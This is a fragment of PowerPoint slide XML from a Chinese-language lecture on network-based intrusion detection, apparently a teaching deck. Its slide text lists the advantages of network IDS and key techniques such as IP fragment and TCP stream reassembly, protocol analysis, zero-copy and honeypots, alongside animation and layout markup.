                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="83" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="13000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="84" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="202"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="202"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_c</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="tx1"/>
                                      </p:to>
                                    </p:animClr>
                                  </p:subTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="86" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="13500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="87" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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201"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="93"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utoUpdateAnimBg="0"/>
      <p:bldP spid="20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98" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1235710" y="1505268"/>
            <a:ext cx="1619250" cy="1619250"/>
            <a:chOff x="58718" y="4929198"/>
            <a:chExt cx="1548000" cy="1548000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101399" name="Picture 5" descr="DO_circle001"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="58718" y="4929198"/>
              <a:ext cx="1548000" cy="1548000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101400" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409902" y="5313162"/>
              <a:ext cx="857470" cy="793426"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>主要</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A25D0A"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>特点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2964296" y="1961338"/>
            <a:ext cx="2254885" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="3551" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="231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成本低</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="组合 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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17"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8" name="组合 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2972551" y="2498548"/>
            <a:ext cx="5205095" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="8197" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="696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攻击者很难转移</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>消除证据</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="组合 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>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2"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3" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2983346" y="3038298"/>
            <a:ext cx="5060315" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="7969" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="673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能够进行实时检测和响应</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="组合 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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7"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28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2983346" y="3599003"/>
            <a:ext cx="5685155" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="8953" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="772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能够检测未成功的攻击企图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="组合 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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2"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33" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2994141" y="4195268"/>
            <a:ext cx="4559935" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="7181" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="594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独立于操作系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35" name="组合 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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7"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2150" y="4013835"/>
            <a:ext cx="3095625" cy="2065655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E81585-4D85-4283-AC14-E654B259D596}"/>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4743450"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基于网络的入侵检测关键技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1676400" y="2306320"/>
            <a:ext cx="4547235" cy="547370"/>
            <a:chOff x="1834" y="4075"/>
            <a:chExt cx="7161" cy="862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="103428" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2917" y="4097"/>
              <a:ext cx="6078" cy="840"/>
              <a:chOff x="4061615" y="1886870"/>
              <a:chExt cx="4749037" cy="464583"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="103429"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103430"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en-US" altLang="zh-CN" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>IP</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>碎片重组技术</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="103431" name="Group 14"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1834" y="4075"/>
              <a:ext cx="866" cy="781"/>
              <a:chOff x="4320" y="1152"/>
              <a:chExt cx="414" cy="402"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2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一</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21"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pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="图片 74" descr="internet-traffic.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7145020" y="2005648"/>
            <a:ext cx="2460625" cy="1741487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1673860" y="2919095"/>
            <a:ext cx="4547235" cy="547370"/>
            <a:chOff x="1834" y="4075"/>
            <a:chExt cx="7161" cy="862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2917" y="4097"/>
              <a:ext cx="6078" cy="840"/>
              <a:chOff x="4061615" y="1886870"/>
              <a:chExt cx="4749037" cy="464583"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26"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27"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en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>TCP</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>流重组技术</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 14"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1834" y="4075"/>
              <a:ext cx="866" cy="781"/>
              <a:chOff x="4320" y="1152"/>
              <a:chExt cx="414" cy="402"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31"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二</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1673860" y="3534410"/>
            <a:ext cx="4547235" cy="547370"/>
            <a:chOff x="1834" y="4075"/>
            <a:chExt cx="7161" cy="862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2917" y="4097"/>
              <a:ext cx="6078" cy="840"/>
              <a:chOff x="4061615" y="1886870"/>
              <a:chExt cx="4749037" cy="464583"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35"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43"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en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>TCP</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>状态检测技术</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="Group 14"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1834" y="4075"/>
              <a:ext cx="866" cy="781"/>
              <a:chOff x="4320" y="1152"/>
              <a:chExt cx="414" cy="402"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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三</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="57"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1673860" y="4158615"/>
            <a:ext cx="4547235" cy="547370"/>
            <a:chOff x="1834" y="4075"/>
            <a:chExt cx="7161" cy="862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2917" y="4097"/>
              <a:ext cx="6078" cy="840"/>
              <a:chOff x="4061615" y="1886870"/>
              <a:chExt cx="4749037" cy="464583"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="63"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64"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zh-CN" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>网络协议分析</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>技术</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="65" name="Group 14"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1834" y="4075"/>
              <a:ext cx="866" cy="781"/>
              <a:chOff x="4320" y="1152"/>
              <a:chExt cx="414" cy="402"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6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四</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="组合 73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1667510" y="4782820"/>
            <a:ext cx="4547235" cy="547370"/>
            <a:chOff x="1834" y="4075"/>
            <a:chExt cx="7161" cy="862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="76" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2917" y="4097"/>
              <a:ext cx="6078" cy="840"/>
              <a:chOff x="4061615" y="1886870"/>
              <a:chExt cx="4749037" cy="464583"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77"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78"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zh-CN" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>零复制</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>技术</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="79" name="Group 14"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1834" y="4075"/>
              <a:ext cx="866" cy="781"/>
              <a:chOff x="4320" y="1152"/>
              <a:chExt cx="414" cy="402"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="80"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五</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="81"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="82" name="组合 81"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1669415" y="5417820"/>
            <a:ext cx="4547235" cy="547370"/>
            <a:chOff x="1834" y="4075"/>
            <a:chExt cx="7161" cy="862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="83" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2917" y="4097"/>
              <a:ext cx="6078" cy="840"/>
              <a:chOff x="4061615" y="1886870"/>
              <a:chExt cx="4749037" cy="464583"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="AutoShape 10"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4061615" y="1886870"/>
                <a:ext cx="4749037" cy="464583"/>
              </a:xfrm>
              <a:prstGeom prst="homePlate">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25933"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85" name="矩形 15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4061615" y="1925644"/>
                <a:ext cx="4531394" cy="374849"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="120000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>蜜罐</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>蜜网技术</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 14"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1834" y="4075"/>
              <a:ext cx="866" cy="781"/>
              <a:chOff x="4320" y="1152"/>
              <a:chExt cx="414" cy="402"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="87"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a typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>六</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="88" name="Freeform 16"/>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grpSp>
      </p:grpSp>
      <p:pic>
